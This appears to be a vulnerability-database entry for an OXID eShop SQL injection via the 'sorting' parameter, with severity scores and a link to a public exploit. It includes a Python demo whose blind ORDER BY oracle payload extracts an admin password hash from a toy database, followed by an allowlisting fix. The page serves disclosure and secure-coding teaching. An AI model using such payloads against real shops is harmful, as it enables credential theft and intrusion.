CVE-2019-25260

HIGH

OXID eShop 6.x < 6.3.4 - SQL Injection via Sorting Parameter

Title source: llm
Exploitation Summary

EIP tracks 1 public exploit for CVE-2019-25260. PoCs published by VulnSpy.

AI-analyzed exploit summary: This exploit demonstrates a SQL injection vulnerability in OXID eShop versions prior to 6.3.4, allowing an attacker to inject malicious SQL queries via the 'sorting' parameter. The injected SQL inserts PHP code into the database, which can then be executed to achieve remote code execution (RCE) by accessing a specific URL.

Description

OXID eShop versions 6.x prior to 6.3.4 contain a SQL injection vulnerability in the 'sorting' parameter (CWE-89): the parameter is used in a database query without adequate validation, so an unauthenticated attacker can alter the query by supplying a crafted value. According to the published exploit, the injection is used to write PHP code into the database, which is then executed by requesting a crafted URL, turning the SQL injection into remote code execution.
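
The following is an added example written for this page, not OXID eShop's own code, illustrating the bug class behind this entry: a product listing that concatenates a user-supplied 'sorting' parameter into an ORDER BY clause, a blind ORDER BY oracle that extracts data through it, and an allowlisting replacement. The table and column names (oxarticles, oxuser, oxpassword), the sample rows and the `column|direction` parameter format are assumptions made for the demo; the example does not reproduce the PHP-write step the published exploit is said to perform.

```python
"""Added example for this page, not OXID eShop code: a listing that pastes a
user-supplied 'sorting' parameter into ORDER BY (the CWE-89 bug class of this
entry), a blind ORDER BY oracle that exploits it, and an allowlisting fix.
Table and column names (oxarticles, oxuser, oxpassword) and all rows are
assumed/constructed for the demo."""
import re
import sqlite3
from typing import Callable, List, Optional

# Assumed: the only columns the listing is meant to sort by.
ALLOWED_SORT_COLUMNS = {"oxtitle", "oxprice"}


def _db() -> sqlite3.Connection:
    """In-memory shop database populated with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE oxarticles (oxid TEXT, oxtitle TEXT, oxprice REAL);
        INSERT INTO oxarticles VALUES ('a1', 'Mug', 9.5), ('a2', 'Tee', 19.0), ('a3', 'Cap', 12.0);
        CREATE TABLE oxuser (oxid TEXT, oxpassword TEXT);
        INSERT INTO oxuser VALUES ('admin', 'secrethash');
        """
    )
    return conn


def vulnerable_query(sorting: str) -> str:
    # VULNERABLE: the request parameter is pasted into ORDER BY unchanged.
    return f"SELECT oxid FROM oxarticles ORDER BY {sorting}"


def safe_query(sorting: str) -> str:
    # HARDENED: accept only "<column>|<asc|desc>" with both parts allowlisted;
    # the SQL is assembled from the allowlisted tokens, never from raw input.
    m = re.fullmatch(r"([a-z]+)\|(asc|desc)", sorting)
    if not m or m.group(1) not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"rejected sorting value: {sorting!r}")
    column, direction = m.groups()
    return f"SELECT oxid FROM oxarticles ORDER BY {column} {direction.upper()}"


def run(builder: Callable[[str], str], sorting: str) -> List[str]:
    """Execute the query a builder produces and return article ids in result order."""
    conn = _db()
    try:
        return [row[0] for row in conn.execute(builder(sorting))]
    finally:
        conn.close()


def oracle_payload(guess: str) -> str:
    """Blind ORDER BY oracle: the row order depends on whether 'guess' is the
    first character of the admin password hash, so the attacker needs no error
    message or echoed data to read the secret out one character at a time."""
    return (
        "(CASE WHEN (SELECT substr(oxpassword, 1, 1) FROM oxuser WHERE oxid = 'admin')"
        f" = '{guess}' THEN oxprice ELSE -oxprice END) DESC"
    )


def leak_first_char(candidates: str = "abcdefghijklmnopqrstuvwxyz0123456789") -> Optional[str]:
    """Drive the oracle against the vulnerable builder until the result order
    matches the 'condition true' ordering (price descending)."""
    true_order = run(vulnerable_query, "oxprice DESC")
    for c in candidates:
        if run(vulnerable_query, oracle_payload(c)) == true_order:
            return c
    return None


def is_rejected(sorting: str) -> bool:
    """True if the hardened builder refuses the sorting value."""
    try:
        safe_query(sorting)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable builder, leaked first hash char:", leak_first_char())
    print("hardened builder rejects payload:", is_rejected(oracle_payload("s")))
    print("hardened builder accepts oxprice|asc:", run(safe_query, "oxprice|asc"))
```

The oracle shows why an injection point that only influences sort order is still fully exploitable: each request answers one yes/no question about the database, and the order of the result rows carries the answer. The fix does not escape the input; it maps a small set of accepted tokens onto SQL identifiers and refuses everything else, which is the only robust way to handle identifiers (column names, directions) that cannot be bound as query parameters.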

Exploits (1)

exploitdb WORKING POC
by VulnSpy · text · webapps · php
https://www.exploit-db.com/exploits/48527

Classification
Working PoC 90%
Attack Type
SQLi
Complexity
Moderate
Reliability
Reliable
Target: OXID eShop versions 6.x (prior to 6.3.4)
No auth needed
Prerequisites: Access to a vulnerable OXID eShop instance · Ability to craft and send HTTP requests with malicious parameters
devstral-2 · analyzed Feb 16, 2026

References (7)

Scores

CVSS v3 8.2
EPSS 0.0041
EPSS Percentile 32.4%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CISA SSVC

Vulnrichment
Exploitation poc
Automatable yes
Technical Impact partial

Details

CWE
CWE-89
Status published
Products (1)
OXID-eSales/OXID eShop Versions 6.x (prior to 6.3.4)
Published Feb 03, 2026
Tracked Since Feb 18, 2026